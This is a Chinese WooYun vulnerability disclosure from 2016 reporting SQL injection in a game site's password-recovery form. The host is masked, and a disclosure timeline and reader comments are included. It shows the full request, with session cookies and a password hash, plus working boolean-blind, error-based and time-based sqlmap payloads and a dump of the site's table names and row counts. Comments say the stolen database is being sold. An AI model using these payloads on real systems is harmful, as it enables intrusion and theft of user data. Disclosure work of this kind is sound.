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漏洞概要 关注数(24) 关注此漏洞




漏洞作者: DeadSea

提交时间:2016-04-02 11:30

修复时间:2016-05-21 11:50

公开时间:2016-05-21 11:50





漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]


4人收藏 收藏



2016-04-02: 细节已通知厂商并且等待厂商处理中
2016-04-06: 厂商已经确认,细节仅向厂商公开
2016-04-16: 细节向核心白帽子及相关领域专家公开
2016-04-26: 细节向普通白帽子公开
2016-05-06: 细节向实习白帽子公开
2016-05-21: 细节向公众公开





POST http://**.**.**.**/user_findpwd.php?t=doemail HTTP/1.1
Host: **.**.**.**
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Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/user_findpwd.php?t=email
Cookie: Hm_lvt_878250ef6d9058d8708994370fb5132c=1459546008; Hm_lpvt_878250ef6d9058d8708994370fb5132c=1459549499; PHPSESSID=144d2qapb7kfrshd3jdrgv1m76; bdshare_firstime=1459549345620; mrand=243969013; msign=e777f9591b90b0ec41549c14f3e2ea66; MemberName=chinasea; NickName=sea; MemberId=3945514; MemberPass=3d3e9afcb73af50299c8ff572daebb46; bmforumerboardidnum=219
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sqlmap identified the following injection point(s) with a total of 358 HTTP(s) r
Parameter: data[name] (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: data[name]=-1228' OR 5159=5159#&data[email]=111111111@**.**.**.**&sub=%E
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: data[name]=-5681' OR 1 GROUP BY CONCAT(0x71706a6b71,(SELECT (CASE W
HEN (3827=3827) THEN 1 ELSE 0 END)),0x716b767671,FLOOR(RAND(0)*2)) HAVING MIN(0)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: data[name]=1111' AND (SELECT * FROM (SELECT(SLEEP(5)))XyKJ)#&data[e
[06:38:13] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL 5.0.12


| Table | Entries |
| ebogame_member_login | 4026283 |
| ebogame_member | 2350328 |
| ebogame_activation | 826836 |
| ebogame_member_integral | 691708 |
| ebogame_charge_20160118 | 465322 |
| pre_ucenter_members | 388347 |
| bbs_userlist | 340566 |
| ebogame_member_info | 292054 |
| ebogame_member_serv | 292044 |
| ebogame_member_char | 241395 |
| ebogame_charge | 175353 |
| api_send_mail | 61235 |
| ebogame_advertising_click | 52260 |
| pre_common_district | 45051 |
| ebogame_charge_copy | 43282 |
| ebogame_questions | 36047 |
| pre_forum_post | 27728 |
| ebogame_game_gift_code_17173 | 20000 |
| pre_home_notification | 14236 |
| pre_common_credit_rule_log | 13014 |
| pre_forum_thread | 12229 |
| pre_forum_threadpartake | 10744 |
| pre_forum_threadmod | 9011 |
| pre_common_member_count | 8182 |
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| pre_common_member_field_home | 8182 |
| pre_common_member_profile | 8182 |
| pre_common_member_status | 8182 |
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| pre_common_onlinetime | 6443 |
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| bbs_posts | 5157 |
| ebogame_game_gift_code | 5000 |
| pre_forum_statlog | 4990 |
| pre_ucenter_memberfields | 4811 |
| ebogame_member_price | 3442 |
| ebogame_game_gift_code_ | 3000 |
| ebogame_content | 2640 |
| ebogame_extension_member | 2591 |
| ebogame_news | 2288 |
| bbs_apclog | 2061 |
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| bbs_actlogs | 1449 |
| pre_common_member_crime | 1239 |
| pre_forum_modwork | 1003 |
| pre_common_stat | 899 |
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| pre_forum_thread_moderate | 653 |
| ebogame_charge_heepay | 591 |
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| pre_ucenter_pm_members | 244 |
| pre_forum_attachment_1 | 222 |
| pre_forum_attachment_3 | 212 |
| pre_forum_attachment_4 | 180 |
| pre_forum_post_tableid | 174 |
| pre_forum_attachment_9 | 168 |
| pre_forum_attachment_5 | 161 |
| sglj_extension | 154 |
| ebogame_advertising | 151 |
| pre_ucenter_pm_lists | 129 |
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| bbs_ugoptlist | 115 |
| pre_ucenter_pm_messages_0 | 114 |
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| pre_common_member_profile_setting | 51 |
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| pre_ucenter_pm_messages_5 | 35 |
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| pre_ucenter_pm_messages_2 | 31 |
| pre_home_friend_request | 30 |
| pre_ucenter_pm_messages_6 | 29 |
| pre_ucenter_settings | 26 |
| bbs_emoticons | 25 |
| ebogame_games | 25 |
| pre_ucenter_pm_messages_4 | 25 |
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| pre_ucenter_pm_messages_8 | 23 |
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| pre_ucenter_pm_messages_9 | 22 |
| ebogame_extension_settlemen | 21 |
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| ebogame_game_gift_info_17173 | 10 |
| pre_forum_medal | 10 |
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| Table | Entries |
| ebogame_member_login | 4026283 |
| ebogame_member | 2350328 |
| ebogame_activation | 826836 |
| ebogame_member_integral | 691708 |
| ebogame_charge_20160118 | 465322 |
| pre_ucenter_members | 388347 |
| bbs_userlist | 340566 |
| ebogame_member_info | 292054 |
| ebogame_member_serv | 292044 |
| ebogame_member_char | 241395 |
| ebogame_charge | 175353 |
| api_send_mail | 61235 |
| ebogame_advertising_click | 52260 |
| pre_common_district | 45051 |
| ebogame_charge_copy | 43282 |
| ebogame_questions | 36047 |
| pre_forum_post | 27728 |
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| pre_home_notification | 14236 |
| pre_common_credit_rule_log | 13014 |
| pre_forum_thread | 12229 |
| pre_forum_threadpartake | 10744 |
| pre_forum_threadmod | 9011 |
| pre_common_member_count | 8182 |
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| pre_common_member_field_home | 8182 |
| pre_common_member_profile | 8182 |
| pre_common_member_status | 8182 |
| pre_common_member | 8174 |
| pre_common_onlinetime | 6443 |
| ebogame_game_code | 6210 |
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| ebogame_game_gift_code | 5000 |
| pre_forum_statlog | 4990 |
| pre_ucenter_memberfields | 4811 |
| ebogame_member_price | 3442 |
| ebogame_game_gift_code_ | 3000 |
| ebogame_content | 2640 |
| ebogame_extension_member | 2591 |
| ebogame_news | 2288 |
| bbs_apclog | 2061 |
| ebogame_question_reply | 1668 |
| pre_forum_attachment | 1566 |
| pre_forum_pollvoter | 1455 |
| bbs_actlogs | 1449 |
| pre_common_member_crime | 1239 |
| pre_forum_modwork | 1003 |
| pre_common_stat | 899 |
| bbs_threads | 874 |
| pre_forum_thread_moderate | 653 |
| ebogame_charge_heepay | 591 |
| bbs_primsg | 517 |
| pre_common_member_action_log | 496 |
| pre_ucenter_pm_indexes | 419 |
| pre_forum_threadimage | 405 |
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| ebogame_game_areas | 358 |
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| pre_forum_attachment_3 | 212 |
| pre_forum_attachment_4 | 180 |
| pre_forum_post_tableid | 174 |
| pre_forum_attachment_9 | 168 |
| pre_forum_attachment_5 | 161 |
| sglj_extension | 154 |
| ebogame_advertising | 151 |
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| pre_ucenter_pm_messages_0 | 114 |
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| pre_forum_attachment_unused | 103 |
| pre_forum_attachment_0 | 102 |
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| pre_ucenter_pm_messages_5 | 35 |
| ebogame_category | 33 |
| ebogame_price | 33 |
| pre_home_friend | 32 |
| pre_common_credit_rule | 31 |
| pre_ucenter_pm_messages_2 | 31 |
| pre_home_friend_request | 30 |
| pre_ucenter_pm_messages_6 | 29 |
| pre_ucenter_settings | 26 |
| bbs_emoticons | 25 |
| ebogame_games | 25 |
| pre_ucenter_pm_messages_4 | 25 |
| bbs_search | 23 |
| pre_ucenter_pm_messages_8 | 23 |
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| pre_ucenter_pm_messages_9 | 22 |
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| pre_forum_threadclosed | 14 |
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| pre_forum_replycredit | 13 |
| bbs_levels | 12 |
| pre_common_banned | 12 |
| pre_common_session | 11 |
| pre_forum_poststick | 11 |
| ebogame_game_gift_info_17173 | 10 |
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| pre_forum_bbcode | 4 |
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| ebogame_game_gift_info_ | 3 |
| pre_common_admincp_member | 3 |
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| pre_ucenter_admins | 1 |
| pre_ucenter_applications | 1 |
| pre_ucenter_failedlogins | 1 |


版权声明:转载请注明来源 DeadSea@乌云





确认时间:2016-04-06 11:41







  1. 2016-04-03 00:01 | ActOr ( 实习白帽子 | Rank:54 漏洞数:5 | 人稳不言,水深不语。)


  2. 2016-04-03 18:45 | 小龙 ( 普通白帽子 | Rank:2465 漏洞数:501 | 我就问,还有谁!!!!!!!!!!!!!...)

    @ActOr 我已经看到群里有人在卖了~。~

  3. 2016-04-03 20:16 | ActOr ( 实习白帽子 | Rank:54 漏洞数:5 | 人稳不言,水深不语。)

    @小龙 ebogame和5ebo的库是分开的。这个没用,5ebo还有个网游暗黑之光 - -